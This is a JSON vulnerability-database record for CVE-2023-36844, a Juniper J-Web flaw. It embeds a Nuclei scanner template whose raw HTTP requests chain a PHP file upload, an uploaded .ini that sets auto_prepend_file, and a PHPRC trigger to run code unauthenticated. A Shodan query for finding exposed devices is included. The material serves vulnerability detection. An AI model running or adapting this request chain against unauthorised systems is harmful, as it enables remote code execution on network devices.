{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-36844/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-36844/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-36844/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-36844/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-36844/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-36844"},"sightings":{"href":"/api/v1/sightings/cve-2023-36844"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.89958,"kev":true,"percentile":0.99788},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-36844.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2023-36844\n\ninfo:\n  name: Juniper Devices - Remote Code Execution\n  author: princechaddha,ritikchaddha\n  severity: medium\n  description: |\n    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.\n  remediation: |\n    Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.\n  reference:\n    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/\n    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844\n    - https://supportportal.juniper.net/JSA72300\n    - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html\n    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2023-36844\n    cwe-id: CWE-473\n    epss-score: 0.89958\n    epss-percentile: 0.99788\n    cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: juniper\n    product: srx100\n    shodan-query: title:\"Juniper Web Device Manager\"\n  tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev,vuln\nvariables:\n  string: \"CVE-2023-36844\"\n  payload: \"('<?php echo md5('{{string}}');unlink(__FILE__);?>')\"\n\nhttp:\n  - raw:\n      - |\n        POST /webauth_operation.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        rs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n      - |\n        POST /webauth_operation.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        rs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n      - |\n        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - '\"original_fileName\":'\n          - '\"converted_fileName\":'\n        condition: and\n\n      - type: word\n        part: body_3\n        words:\n          - '{{md5(string)}}'\n\n    extractors:\n      - type: regex\n        part: body_1\n        name: phpfile\n        regex:\n          - \"([a-f0-9]{64}\\\\.php)\"\n        internal: true\n\n      - type: regex\n        part: body_2\n        name: inifile\n        regex:\n          - \"([a-f0-9]{64}\\\\.ini)\"\n        internal: true\n# digest: 4b0a00483046022100b60c623afb6d77f1acdb4f9fa9449e09582584488db7fbef32c8f51fca2a026b022100f92a243d7fae78e865d2facb86fa776c376b970ec0612e52db8ab359d1f1a177:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-36844"}